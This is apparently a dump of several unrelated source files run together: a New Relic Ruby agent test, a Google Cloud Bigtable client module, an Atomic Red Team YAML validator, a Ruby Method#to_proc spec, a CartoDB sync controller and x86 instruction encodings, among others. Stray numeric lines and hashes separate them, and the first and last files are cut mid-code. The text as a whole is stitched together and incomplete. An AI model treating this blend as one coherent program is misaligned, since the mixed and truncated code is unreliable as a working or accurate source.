'social_security_number' => "001-555-1212" samples = agent.transaction_sampler.samples assert_equal num_samples + 1, samples.length assert_equal "[FILTERED]", samples.last.params[:request_params]["social_security_number"] end def test_controller_params agent.transaction_sampler.reset! get :index, 'number' => "001-555-1212" s = with_config(:'transaction_tracer.transaction_threshold' => 0.0) do agent.transaction_sampler.harvest(nil) end assert_equal 1, s.size assert_equal 5, s.first.params.size end def test_busy_calculation_correctly_calculates_based_acccumlator # woah it's 1970 now = Time.at 0 # We'll record two seconds of transactions later = Time.at(now + 2) NewRelic::Agent::BusyCalculator.stubs(:time_now). returns(now).then.returns(later) # reset harvest time to epoch (based on stub) NewRelic::Agent::BusyCalculator.reset # We record 1 second of busy time in our two seconds of wall clock NewRelic::Agent::BusyCalculator.instance_variable_set(:@accumulator, 1.0) NewRelic::Agent::BusyCalculator.harvest_busy # smooth out floating point math stat_int = (stats('Instance/Busy').total_call_time * 10).to_i # Despite your expectations, #total_call_time is a percentage here. 
assert_equal(stat_int, 5, "#{stats('Instance/Busy').total_call_time} != 0.5") end def test_busy_calculation_generates_a_positive_value engine.clear_stats get :index, 'social_security_number' => "001-555-1212", 'wait' => '0.05' NewRelic::Agent::BusyCalculator.harvest_busy assert_equal 1, stats('Instance/Busy').call_count assert_equal 1, stats('HttpDispatcher').call_count # Timing is too non-deterministic, so we just assert a positive, non-zero # value here. See # #test_busy_calculation_correctly_calculates_based_acccumlator for # assertions that the formula is correct. assert(stats('Instance/Busy').total_call_time > 0, "#{stats('Instance/Busy').total_call_time} !> 0") assert_equal 0, stats('WebFrontend/Mongrel/Average Queue Time').call_count end def test_queue_headers_no_header engine.clear_stats queue_length_stat = stats('Mongrel/Queue Length') queue_time_stat = stats('WebFrontend/QueueTime') # no request start header get 'index' assert_equal 0, queue_length_stat.call_count end def test_queue_headers_apache # make this test deterministic Time.stubs(:now => Time.at(10)) NewRelic::Agent::AgentTestController.clear_headers engine.clear_stats queue_length_stat = stats('Mongrel/Queue Length') queue_time_stat = stats('WebFrontend/QueueTime') # apache version of header request_start = ((Time.now.to_f - 0.5) * 1e6).to_i.to_s NewRelic::Agent::AgentTestController.set_some_headers({'HTTP_X_QUEUE_START' => "t=#{request_start}"}) get :index assert_equal(0, queue_length_stat.call_count, 'We should not be seeing a queue length yet') assert_equal(1, queue_time_stat.call_count, 'We should have seen the queue header once') assert(queue_time_stat.total_call_time > 0.1, "Queue time should be longer than 100ms") assert(queue_time_stat.total_call_time < 10, "Queue time should be under 10 seconds (sanity check)") end def test_queue_headers_heroku # make this test deterministic Time.stubs(:now => Time.at(10)) engine.clear_stats NewRelic::Agent::AgentTestController.clear_headers queue_length_stat = stats('Mongrel/Queue Length') queue_time_stat = stats('WebFrontend/QueueTime') # heroku version request_start = ((Time.now.to_f - 0.5) * 1e6).to_i.to_s NewRelic::Agent::AgentTestController.set_some_headers({'HTTP_X_QUEUE_START' => "t=#{request_start}", 'HTTP_X_HEROKU_QUEUE_DEPTH' => '0'}) get :index assert_equal(0, queue_length_stat.total_call_time, 'queue should be empty') assert_equal(1, queue_time_stat.call_count, 'should have seen the queue header once') assert(queue_time_stat.total_call_time > 0.1, "Queue time should be longer than 100ms") assert(queue_time_stat.total_call_time < 10, "Queue time should be under 10 seconds (sanity check)") end def test_queue_headers_heroku_queue_length # make this test deterministic Time.stubs(:now => Time.at(10)) engine.clear_stats NewRelic::Agent::AgentTestController.clear_headers queue_length_stat = stats('Mongrel/Queue Length') queue_time_stat = stats('WebFrontend/QueueTime') # heroku version with queue length > 0 request_start = ((Time.now.to_f - 0.5) * 1e6).to_i.to_s NewRelic::Agent::AgentTestController.set_some_headers({'HTTP_X_QUEUE_START' => "t=#{request_start}", 'HTTP_X_HEROKU_QUEUE_DEPTH' => '3'}) get :index assert_equal(1, queue_length_stat.call_count, 'queue should have been seen once') assert_equal(1, queue_time_stat.call_count, 'should have seen the queue header once') assert(queue_time_stat.total_call_time > 0.1, "Queue time should be longer than 100ms") assert(queue_time_stat.total_call_time < 10, "Queue time should be under 10 seconds (sanity check)") 
assert_equal(3, queue_length_stat.total_call_time, 'queue should be 3 long') NewRelic::Agent::AgentTestController.clear_headers end private def stats(name) engine.get_stats_no_scope(name) end end if defined? Rails
38.424096
189
0.717108
39558ae43caa9021300a3d6206f81504c52a3595
10,339
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. require "google/gax" require "pathname" module Google module Cloud module Bigtable # rubocop:disable LineLength ## # # Ruby Client for Cloud Bigtable Admin API # # [Cloud Bigtable Admin API][Product Documentation]: # Administer your Cloud Bigtable tables and instances. # - [Product Documentation][] # # ## Quick Start # In order to use this library, you first need to go through the following # steps: # # 1. [Select or create a Cloud Platform project.](https://console.cloud.google.com/project) # 2. [Enable billing for your project.](https://cloud.google.com/billing/docs/how-to/modify-project#enable_billing_for_a_project) # 3. [Enable the Cloud Bigtable Admin API.](https://console.cloud.google.com/apis/library/bigtableadmin.googleapis.com) # 4. [Setup Authentication.](https://googleapis.dev/ruby/google-cloud-bigtable/latest/file.AUTHENTICATION.html) # # ### Installation # ``` # $ gem install google-cloud-bigtable # ``` # # ### Next Steps # - Read the [Cloud Bigtable Admin API Product documentation][Product Documentation] # to learn more about the product and see How-to Guides. # - View this [repository's main README](https://github.com/googleapis/google-cloud-ruby/blob/master/README.md) # to see the full list of Cloud APIs that we cover. # # [Product Documentation]: https://cloud.google.com/bigtable/docs/reference/admin/rpc # # ## Enabling Logging # # To enable logging for this library, set the logger for the underlying [gRPC](https://github.com/grpc/grpc/tree/master/src/ruby) library. # The logger that you set may be a Ruby stdlib [`Logger`](https://ruby-doc.org/stdlib-2.5.0/libdoc/logger/rdoc/Logger.html) as shown below, # or a [`Google::Cloud::Logging::Logger`](https://googleapis.dev/ruby/google-cloud-logging/latest) # that will write logs to [Stackdriver Logging](https://cloud.google.com/logging/). See [grpc/logconfig.rb](https://github.com/grpc/grpc/blob/master/src/ruby/lib/grpc/logconfig.rb) # and the gRPC [spec_helper.rb](https://github.com/grpc/grpc/blob/master/src/ruby/spec/spec_helper.rb) for additional information. # # Configuring a Ruby stdlib logger: # # ```ruby # require "logger" # # module MyLogger # LOGGER = Logger.new $stderr, level: Logger::WARN # def logger # LOGGER # end # end # # # Define a gRPC module-level logger method before grpc/logconfig.rb loads. # module GRPC # extend MyLogger # end # ``` # module Admin # rubocop:enable LineLength FILE_DIR = File.realdirpath(Pathname.new(__FILE__).join("..").join("admin")) AVAILABLE_VERSIONS = Dir["#{FILE_DIR}/*"] .select { |file| File.directory?(file) } .select { |dir| Google::Gax::VERSION_MATCHER.match(File.basename(dir)) } .select { |dir| File.exist?(dir + ".rb") } .map { |dir| File.basename(dir) } module BigtableInstanceAdmin ## # Service for creating, configuring, and deleting Cloud Bigtable Instances and # Clusters. Provides access to the Instance and Cluster schemas only, not the # tables' metadata or data stored in those tables. 
# # @param version [Symbol, String] # The major version of the service to be used. By default :v2 # is used. # @overload new(version:, credentials:, scopes:, client_config:, timeout:) # @param credentials [Google::Auth::Credentials, String, Hash, GRPC::Core::Channel, GRPC::Core::ChannelCredentials, Proc] # Provides the means for authenticating requests made by the client. This parameter can # be many types. # A `Google::Auth::Credentials` uses a the properties of its represented keyfile for # authenticating requests made by this client. # A `String` will be treated as the path to the keyfile to be used for the construction of # credentials for this client. # A `Hash` will be treated as the contents of a keyfile to be used for the construction of # credentials for this client. # A `GRPC::Core::Channel` will be used to make calls through. # A `GRPC::Core::ChannelCredentials` for the setting up the RPC client. The channel credentials # should already be composed with a `GRPC::Core::CallCredentials` object. # A `Proc` will be used as an updater_proc for the Grpc channel. The proc transforms the # metadata for requests, generally, to give OAuth credentials. # @param scopes [Array<String>] # The OAuth scopes for this service. This parameter is ignored if # an updater_proc is supplied. # @param client_config [Hash] # A Hash for call options for each method. See # Google::Gax#construct_settings for the structure of # this data. Falls back to the default config if not specified # or the specified config is missing data points. # @param timeout [Numeric] # The default timeout, in seconds, for calls made through this client. # @param metadata [Hash] # Default metadata to be sent with each request. This can be overridden on a per call basis. # @param exception_transformer [Proc] # An optional proc that intercepts any exceptions raised during an API call to inject # custom error handling. def self.new(*args, version: :v2, **kwargs) unless AVAILABLE_VERSIONS.include?(version.to_s.downcase) raise "The version: #{version} is not available. The available versions " \ "are: [#{AVAILABLE_VERSIONS.join(", ")}]" end require "#{FILE_DIR}/#{version.to_s.downcase}" version_module = Google::Cloud::Bigtable::Admin .constants .select {|sym| sym.to_s.downcase == version.to_s.downcase} .first Google::Cloud::Bigtable::Admin.const_get(version_module)::BigtableInstanceAdmin.new(*args, **kwargs) end end module BigtableTableAdmin ## # Service for creating, configuring, and deleting Cloud Bigtable tables. # # # Provides access to the table schemas only, not the data stored within # the tables. # # @param version [Symbol, String] # The major version of the service to be used. By default :v2 # is used. # @overload new(version:, credentials:, scopes:, client_config:, timeout:) # @param credentials [Google::Auth::Credentials, String, Hash, GRPC::Core::Channel, GRPC::Core::ChannelCredentials, Proc] # Provides the means for authenticating requests made by the client. This parameter can # be many types. # A `Google::Auth::Credentials` uses a the properties of its represented keyfile for # authenticating requests made by this client. # A `String` will be treated as the path to the keyfile to be used for the construction of # credentials for this client. # A `Hash` will be treated as the contents of a keyfile to be used for the construction of # credentials for this client. # A `GRPC::Core::Channel` will be used to make calls through. # A `GRPC::Core::ChannelCredentials` for the setting up the RPC client. 
The channel credentials # should already be composed with a `GRPC::Core::CallCredentials` object. # A `Proc` will be used as an updater_proc for the Grpc channel. The proc transforms the # metadata for requests, generally, to give OAuth credentials. # @param scopes [Array<String>] # The OAuth scopes for this service. This parameter is ignored if # an updater_proc is supplied. # @param client_config [Hash] # A Hash for call options for each method. See # Google::Gax#construct_settings for the structure of # this data. Falls back to the default config if not specified # or the specified config is missing data points. # @param timeout [Numeric] # The default timeout, in seconds, for calls made through this client. # @param metadata [Hash] # Default metadata to be sent with each request. This can be overridden on a per call basis. # @param exception_transformer [Proc] # An optional proc that intercepts any exceptions raised during an API call to inject # custom error handling. def self.new(*args, version: :v2, **kwargs) unless AVAILABLE_VERSIONS.include?(version.to_s.downcase) raise "The version: #{version} is not available. The available versions " \ "are: [#{AVAILABLE_VERSIONS.join(", ")}]" end require "#{FILE_DIR}/#{version.to_s.downcase}" version_module = Google::Cloud::Bigtable::Admin .constants .select {|sym| sym.to_s.downcase == version.to_s.downcase} .first Google::Cloud::Bigtable::Admin.const_get(version_module)::BigtableTableAdmin.new(*args, **kwargs) end end end end end end
50.931034
186
0.625206
bf104bf8a401f19b26b2d81f11e816fb3976b446
9,058
require 'yaml' require 'erb' require 'attack_api' class AtomicRedTeam ATTACK_API = Attack.new ATOMICS_DIRECTORY = "#{File.dirname(File.dirname(__FILE__))}/atomics" # TODO- should these all be relative URLs? ROOT_GITHUB_URL = "https://github.com/redcanaryco/atomic-red-team" # # Returns a list of paths that contain Atomic Tests # def atomic_test_paths Dir["#{ATOMICS_DIRECTORY}/T*/T*.yaml"].sort end # # Returns a list of Atomic Tests in Atomic Red Team (as Hashes from source YAML) # def atomic_tests @atomic_tests ||= atomic_test_paths.collect do |path| atomic_yaml = YAML.load(File.read path) atomic_yaml['atomic_yaml_path'] = path atomic_yaml end end # # Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object # def atomic_tests_for_technique(technique_or_technique_identifier) technique_identifier = if technique_or_technique_identifier.is_a? Hash ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier else technique_or_technique_identifier end atomic_tests.find do |atomic_yaml| atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase end.to_h.fetch('atomic_tests', []) end # # Returns a Markdown formatted Github link to a technique. This will be to the edit page for # techniques that already have one or more Atomic Red Team tests, or the create page for # techniques that have no existing tests. # def github_link_to_technique(technique, include_identifier: false, link_new_to_contrib: true) technique_identifier = ATTACK_API.technique_identifier_for_technique(technique).upcase link_display = "#{"#{technique_identifier.upcase} " if include_identifier}#{technique['name']}" if File.exists? "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md" # we have a file for this technique, so link to it's Markdown file "[#{link_display}](./#{technique_identifier}/#{technique_identifier}.md)" else # we don't have a file for this technique, so link to an edit page "#{link_display} [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)" end end def validate_atomic_yaml!(yaml) raise("YAML file has no elements") if yaml.nil? 
raise('`attack_technique` element is required') unless yaml.has_key?('attack_technique') raise('`attack_technique` element must be an array') unless yaml['attack_technique'].is_a?(String) raise('`display_name` element is required') unless yaml.has_key?('display_name') raise('`display_name` element must be an array') unless yaml['display_name'].is_a?(String) raise('`atomic_tests` element is required') unless yaml.has_key?('atomic_tests') raise('`atomic_tests` element must be an array') unless yaml['atomic_tests'].is_a?(Array) raise('`atomic_tests` element is empty - you have no tests') unless yaml['atomic_tests'].count > 0 yaml['atomic_tests'].each_with_index do |atomic, i| raise("`atomic_tests[#{i}].name` element is required") unless atomic.has_key?('name') raise("`atomic_tests[#{i}].name` element must be a string") unless atomic['name'].is_a?(String) raise("`atomic_tests[#{i}].description` element is required") unless atomic.has_key?('description') raise("`atomic_tests[#{i}].description` element must be a string") unless atomic['description'].is_a?(String) raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms') raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array) valid_supported_platforms = ['windows', 'macos', 'linux'] atomic['supported_platforms'].each do |platform| if !valid_supported_platforms.include?(platform) raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}") end end if atomic['dependencies'] atomic['dependencies'].each do |dependency| raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a description}") unless dependency.has_key?('description') raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a prereq_command}") unless dependency.has_key?('prereq_command') raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a get_prereq_command}") unless dependency.has_key?('get_prereq_command') end end (atomic['input_arguments'] || {}).each_with_index do |arg_kvp, iai| arg_name, arg = arg_kvp raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element is required") unless arg.has_key?('description') raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element must be a string") unless arg['description'].is_a?(String) raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element is required") unless arg.has_key?('type') raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element must be a string") unless arg['type'].is_a?(String) raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element must be lowercased and underscored (was #{arg['type']})") unless arg['type'] =~ /[a-z_]+/ # TODO: determine if we think default values are required for EVERY input argument # raise("`atomic_tests[#{i}].input_arguments[#{iai}].default` element is required") unless arg.has_key?('default') # raise("`atomic_tests[#{i}].input_arguments[#{iai}].default` element must be a string (was a #{arg['default'].class.name})") unless arg['default'].is_a?(String) end raise("`atomic_tests[#{i}].executor` element is required") unless atomic.has_key?('executor') executor = atomic['executor'] raise("`atomic_tests[#{i}].executor.name` element is required") unless executor.has_key?('name') raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String) 
raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/ valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual'] case executor['name'] when 'manual' raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps') raise("`atomic_tests[#{i}].executor.steps` element must be a string") unless executor['steps'].is_a?(String) validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys, string: executor['steps'], string_description: "atomic_tests[#{i}].executor.steps" when 'command_prompt', 'sh', 'bash', 'powershell' raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command') raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String) validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys, string: executor['command'], string_description: "atomic_tests[#{i}].executor.command" else raise("`atomic_tests[#{i}].executor.name` '#{executor['name']}' must be one of #{valid_executor_types.join(', ')}") end validate_no_todos!(atomic, path: "atomic_tests[#{i}]") end end # # Validates that the arguments (specified in "#{arg}" format) in a string # match the input_arguments for a test # def validate_input_args_vs_string!(input_args:, string:, string_description:) input_args_in_string = string.scan(/#\{([^}]+)\}/).to_a.flatten input_args_in_string_and_not_specced = input_args_in_string - input_args if input_args_in_string_and_not_specced.count > 0 raise("`#{string_description}` contains args #{input_args_in_string_and_not_specced} not in input_arguments") end input_args_in_spec_not_string = input_args - input_args_in_string if input_args_in_string_and_not_specced.count > 0 raise("`atomic_tests[#{i}].input_arguments` contains args #{input_args_in_spec_not_string} not in command") end end # # Recursively validates that the hash (or something) doesn't contain a TODO # def validate_no_todos!(hashish, path:) if hashish.is_a? String raise "`#{path}` contains a TODO" if hashish.include? 'TODO' elsif hashish.is_a? Array hashish.each_with_index do |item, i| validate_no_todos! item, path: "#{path}[#{i}]" end elsif hashish.is_a? Hash hashish.each do |k, v| validate_no_todos! v, path: "#{path}.#{k}" end end end end
50.044199
182
0.684257
87593108ffd57935a0bd4a976dd5a53c2c0ee234
2,777
require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)

describe "Method#to_proc" do
  before :each do
    ScratchPad.record []

    @m = MethodSpecs::Methods.new
    @meth = @m.method(:foo)
  end

  it "returns a Proc object corresponding to the method" do
    @meth.to_proc.kind_of?(Proc).should == true
  end

  it "returns a Proc which does not depend on the value of self" do
    3.instance_exec(4, &5.method(:+)).should == 9
  end

  it "returns a Proc object with the correct arity" do
    # This may seem redundant but this bug has cropped up in jruby, mri and yarv.
    # http://jira.codehaus.org/browse/JRUBY-124
    [
      :zero, :one_req, :two_req,
      :zero_with_block, :one_req_with_block, :two_req_with_block,
      :one_opt, :one_req_one_opt, :one_req_two_opt, :two_req_one_opt,
      :one_opt_with_block, :one_req_one_opt_with_block, :one_req_two_opt_with_block, :two_req_one_opt_with_block,
      :zero_with_splat, :one_req_with_splat, :two_req_with_splat,
      :one_req_one_opt_with_splat, :one_req_two_opt_with_splat, :two_req_one_opt_with_splat,
      :zero_with_splat_and_block, :one_req_with_splat_and_block, :two_req_with_splat_and_block,
      :one_req_one_opt_with_splat_and_block, :one_req_two_opt_with_splat_and_block, :two_req_one_opt_with_splat_and_block
    ].each do |m|
      @m.method(m).to_proc.arity.should == @m.method(m).arity
    end
  end

  it "returns a proc that can be used by define_method" do
    x = 'test'
    to_s = class << x
      define_method :foo, method(:to_s).to_proc
      to_s
    end

    x.foo.should == to_s
  end

  it "returns a proc that can be yielded to" do
    x = Object.new
    def x.foo(*a); a; end
    def x.bar; yield; end
    def x.baz(*a); yield(*a); end

    m = x.method :foo
    x.bar(&m).should == []
    x.baz(1,2,3,&m).should == [1,2,3]
  end

  it "returns a proc whose binding has the same receiver as the method" do
    @meth.receiver.should == @meth.to_proc.binding.receiver
  end

  # #5926
  it "returns a proc that can receive a block" do
    x = Object.new
    def x.foo; yield 'bar'; end

    m = x.method :foo
    result = nil
    m.to_proc.call {|val| result = val}
    result.should == 'bar'
  end

  it "can be called directly and not unwrap arguments like a block" do
    obj = MethodSpecs::ToProcBeta.new
    obj.to_proc.call([1]).should == [1]
  end

  it "should correctly handle arguments (unwrap)" do
    obj = MethodSpecs::ToProcBeta.new

    array = [[1]]
    array.each(&obj)
    ScratchPad.recorded.should == [[1]]
  end

  it "executes method with whole array (one argument)" do
    obj = MethodSpecs::ToProcBeta.new

    array = [[1, 2]]
    array.each(&obj)
    ScratchPad.recorded.should == [[1, 2]]
  end
end
29.542553
121
0.676269
7a7bab3820592d20d4583b2184eacf458ec8f47f
376
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.

module Azure::AlertsManagement::Mgmt::V2019_05_05_preview
  module Models
    #
    # Defines values for State
    #
    module State
      New = "New"
      Acknowledged = "Acknowledged"
      Closed = "Closed"
    end
  end
end
22.117647
70
0.68617
79b0a7ff432c352e9c5488e8e6ed99fabf10febd
176
class DropUnusedColumns < ActiveRecord::Migration[5.0]
  def change
    remove_column :links, :impressions_count, :integer
    remove_column :links, :score, :integer
  end
end
25.142857
54
0.75
6a90e74db1ba1c031605cb40ab5363609a21a016
8,251
require 'json' require_relative '../../../models/synchronization/member' require_relative '../../../models/synchronization/collection' require_relative '../../../../services/datasources/lib/datasources' require_relative '../../../../services/platform-limits/platform_limits' require_dependency 'carto/url_validator' class Api::Json::SynchronizationsController < Api::ApplicationController include CartoDB include Carto::UrlValidator ssl_required :create, :update, :destroy, :sync, :sync_now before_filter :set_external_source, only: [ :create ] # Upon creation, no rate limit checks def create return head(401) unless current_user.sync_tables_enabled || @external_source @stats_aggregator.timing('synchronizations.create') do begin member_attributes = setup_member_attributes member = Synchronization::Member.new(member_attributes) member = @stats_aggregator.timing('member.save') do member.store end options = setup_data_import_options(member_attributes, member.id) data_import = @stats_aggregator.timing('save') do DataImport.create(options) end if @external_source @stats_aggregator.timing('external-data-import.save') do Carto::ExternalDataImport.new( data_import_id: data_import.id, external_source_id: @external_source.id, synchronization_id: member.id ).save end end ::Resque.enqueue(::Resque::ImporterJobs, job_id: data_import.id) # Need to mark the synchronization job as queued state. # If this is missed there is an error state that can be # achieved where the synchronization job can never be # manually kicked off ever again. This state will occur if the # resque job fails to mark the synchronization state to success or # failure (ie: resque never runs, or bug in ImporterJobs code) member.state = Synchronization::Member::STATE_QUEUED member.store response = { data_import: { endpoint: '/api/v1/imports', item_queue_id: data_import.id } }.merge(member.to_hash) render_jsonp(response) rescue CartoDB::InvalidMember => exception render_jsonp({ errors: member.full_errors }, 400) puts exception.to_s puts exception.backtrace rescue CartoDB::InvalidInterval => exception render_jsonp({ errors: "#{exception.detail['message']}: #{exception.detail['hint']}" }, 400) rescue InvalidUrlError => exception render_jsonp({ errors: exception.message }, 400) end end end def sync(from_sync_now=false) @stats_aggregator.timing('synchronizations.sync') do begin enqueued = false member = Synchronization::Member.new(id: params[:id]).fetch return head(401) unless member.authorize?(current_user) # @see /services/synchronizer/lib/synchronizer/collection.rb -> enqueue_rate_limited() if ( member.should_auto_sync? || (from_sync_now && member.can_manually_sync?) ) platform_limit = CartoDB::PlatformLimits::Importer::UserConcurrentSyncsAmount.new({ user: current_user, redis: { db: $users_metadata } }) if platform_limit.is_within_limit? @stats_aggregator.timing('enqueue') do member.enqueue end enqueued = true platform_limit.increment! 
end end render_jsonp( { enqueued: enqueued, synchronization_id: member.id}) rescue StandardError => exception CartoDB.notify_exception(exception) head(404) end end end def sync_now sync(true) end def update @stats_aggregator.timing('synchronizations.update') do begin member = Synchronization::Member.new(id: params.fetch('id')).fetch return head(401) unless member.authorize?(current_user) member.attributes = payload member = @stats_aggregator.timing('save') do member.store.fetch end render_jsonp(member) rescue KeyError head(404) rescue CartoDB::InvalidMember render_jsonp({ errors: member.full_errors }, 400) end end end def destroy @stats_aggregator.timing('synchronizations.destroy') do begin member = Synchronization::Member.new(id: params.fetch('id')).fetch return(head 401) unless member.authorize?(current_user) @stats_aggregator.timing('delete') do member.delete end return head 204 rescue KeyError head(404) end end end private def set_external_source @external_source = if params[:remote_visualization_id].present? get_external_source(params[:remote_visualization_id]) end end def setup_member_attributes member_attributes = payload.merge( name: params[:table_name], user_id: current_user.id, state: Synchronization::Member::STATE_CREATED, # Keep in sync with https://carto.com/developers/import-api/guides/sync-tables/#params-1 type_guessing: !["false", false].include?(params[:type_guessing]), quoted_fields_guessing: !["false", false].include?(params[:quoted_fields_guessing]), content_guessing: ["true", true].include?(params[:content_guessing]) ) if from_sync_file_provider? member_attributes = member_attributes.merge({ service_name: params[:service_name], service_item_id: params[:service_item_id] }) end if params[:remote_visualization_id].present? member_attributes[:interval] = Carto::ExternalSource::REFRESH_INTERVAL external_source = @external_source member_attributes[:url] = external_source.import_url.presence member_attributes[:service_item_id] = external_source.import_url.presence end if params[:connector].present? member_attributes[:service_name] = 'connector' member_attributes[:service_item_id] = params[:connector].to_json end member_attributes end def setup_data_import_options(member_attributes, member_id) if from_sync_file_provider? service_name = params[:service_name] service_item_id = params[:service_item_id] else service_name = CartoDB::Datasources::Url::PublicUrl::DATASOURCE_NAME service_item_id = params[:url].presence end options = { user_id: current_user.id, table_name: params[:table_name].presence, service_name: service_name, service_item_id: service_item_id, type_guessing: member_attributes[:type_guessing], quoted_fields_guessing: member_attributes[:quoted_fields_guessing], content_guessing: member_attributes[:content_guessing], create_visualization: ["true", true].include?(params[:create_vis]) } if params[:remote_visualization_id].present? external_source = get_external_source(params[:remote_visualization_id]) options.merge!(data_source: external_source.import_url.presence) elsif params[:connector].present? options[:service_name] = 'connector' options[:service_item_id] = params[:connector].to_json else url = params[:url] validate_url!(url) unless Rails.env.development? || Rails.env.test? || url.nil? || url.empty? options.merge!(data_source: url) end options.merge!({ synchronization_id: member_id }) options end def from_sync_file_provider? 
params.include?(:service_name) && params.include?(:service_item_id) end def payload request.body.rewind ::JSON.parse(request.body.read.to_s || String.new) end def get_external_source(remote_visualization_id) external_source = Carto::ExternalSource.where(visualization_id: remote_visualization_id).first unless remote_visualization_id.present? && external_source.importable_by?(current_user) raise CartoDB::Datasources::AuthError.new('Illegal external load') end external_source end end
33.404858
100
0.668767
ed0004d64f436d7d0bea5b5605d3a8d8053584ff
62
module Transbank
  module Sdk
    VERSION = "1.4.0"
  end
end
10.333333
21
0.645161
1159dab3715a6645a99965d38877d9a3df1d91fc
9,055
# frozen_string_literal: true class Fisk module Instructions # Instruction VMOVAPS: Move Aligned Packed Single-Precision Floating-Point Values VMOVAPS = Instruction.new("VMOVAPS", [ # vmovaps: m128{k}{z}, xmm Form.new([ OPERAND_TYPES[73], OPERAND_TYPES[24], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 0, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: xmm{k}{z}, xmm Form.new([ OPERAND_TYPES[57], OPERAND_TYPES[24], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 3, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 3, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: m256{k}{z}, ymm Form.new([ OPERAND_TYPES[74], OPERAND_TYPES[60], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 0, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: ymm{k}{z}, ymm Form.new([ OPERAND_TYPES[59], OPERAND_TYPES[60], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 3, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 3, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: m512{k}{z}, zmm Form.new([ OPERAND_TYPES[75], OPERAND_TYPES[63], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 0, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: zmm{k}{z}, zmm Form.new([ OPERAND_TYPES[62], OPERAND_TYPES[63], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 3, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 3, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: xmm{k}{z}, m128 Form.new([ OPERAND_TYPES[57], OPERAND_TYPES[25], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 0, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: ymm{k}{z}, m256 Form.new([ OPERAND_TYPES[59], OPERAND_TYPES[66], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 0, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: zmm{k}{z}, m512 Form.new([ OPERAND_TYPES[62], OPERAND_TYPES[78], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x28, 0) + 
